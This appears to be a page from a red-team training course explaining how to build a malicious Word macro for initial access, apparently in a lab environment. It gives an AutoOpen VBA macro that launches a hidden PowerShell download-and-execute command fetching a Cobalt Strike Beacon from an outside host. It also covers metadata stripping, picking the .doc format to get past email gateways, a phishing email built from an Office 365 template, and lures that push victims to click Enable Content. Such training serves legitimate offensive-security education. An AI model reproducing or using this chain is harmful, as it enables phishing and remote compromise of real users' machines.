Visual Basic for Applications (VBA) Macros

VBA is an implementation of Visual Basic that is very widely used with Microsoft Office applications - often used to enhance functionality in Word and Excel for data processing. The prevalence of macros in the commercial world is a double-edged sword when it comes to leveraging macros for malicious purposes. On one hand, the presence of a document with embedded macros is not necessarily suspicious; but because they are used maliciously by threat actors, they are also given more scrutiny both from technical products (e.g. web/email gateways) and in security awareness training.

Launch Word on the Attacker Desktop.

You can create a macro in a Word document by going to View > Macros > Create. Change the "Macros in" field from "All active templates and documents" to "Document 1". Give the macro a name and click Create. To force the macro to trigger automatically when the document is opened, use the name AutoOpen.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"

End Sub

\

"wscript" is the Windows Script Host, which is designed for automation. The "shell" method provides the ability to execute OS commands. To test the above code, use the play/pause/stop buttons.

\

\

Next, we need to replace notepad with a Beacon payload. The easiest to leverage is the PowerShell payload. In Cobalt Strike, go to Attacks > Scripted Web Delivery (S) and generate a 64-bit PowerShell payload for your HTTP listener. The URI path can be anything, but I will keep it as /a.

\

\

This will generate a PowerShell payload and host it on the team server so that it can be downloaded over HTTP and executed in-memory. After clicking Launch, Cobalt Strike will generate the PowerShell one-liner that will do just that.

\

\

Copy/paste this line into the VBA and make sure to add another set of double quotation marks around the IEX command. It should look like this:

Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

\

To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information. This is to prevent the username on your system being embedded in the document.

Next, go to File > Save As and save it to C:\Payloads. Give it any filename, but in the Save as type dropdown, change the format from .docx to Word 97-2003 (.doc). We do this because you can't save macros inside a .docx and there's a stigma around the macro-enabled .docm extension (e.g. the thumbnail icon has a huge ! and some web/email gateway block them entirely). I find that this legacy .doc extension is the best compromise.

We then want to upload this file to the team server as well. Go to Site Management > Host File and select your document.

\

\

\

Even though the WYSIWYG text editor in OWA supports HTML, it's not very good for composing rich HTML-based emails. About the best it has are basic formatting options, but there is a bit of a hacky workaround and that is to use a pre-made HTML template. For example, here are some HTML templates based around Office 365 (a copy can also be found in C:\Tools\PhishingTemplates). Open one of them, e.g. Word.html in Edge or another browser. Amazingly, what you can do is Ctrl + A and Ctrl + C to copy the content; and then Ctrl + V to paste it directly into the OWA text editor. All the text and image formatting should be preserved.

You can change the text placeholders and URL to the payload on lines 160, 183, 192, 197, and 207. My payload URL will be http://nickelviper.com/ProductReport.doc.

In the real world, you could use a service such as OneDrive as this would provide you a more legitimate domain name to use.

\

\

\

\

Log into Workstation 2 as Bob, launch Outlook, and the email will arrive.

\

\

Clicking the link will open Edge and automatically download the document. Because the file is being downloaded via a browser, it will have the MOTW. So, when opened, it will first be in Protected View.

\

\

The user must first click Enabled Editing and then on Enable Content to execute the macro. If you attach the document directly to the email, it will not have MOTW and therefore not open in Protected View.

\

\

Many real-life samples you try to entice the user to click this button - usually saying something along the lines of "Security Product XYZ has scanned the content and deemed it to be safe. To reveal the content, click Enable Content".

Once clicked, a PowerShell window will open briefly and then vanish. A new Beacon will appear in Cobalt Strike.

\

PreviousInitial Access PayloadsNextRemote Template Injection

Last updated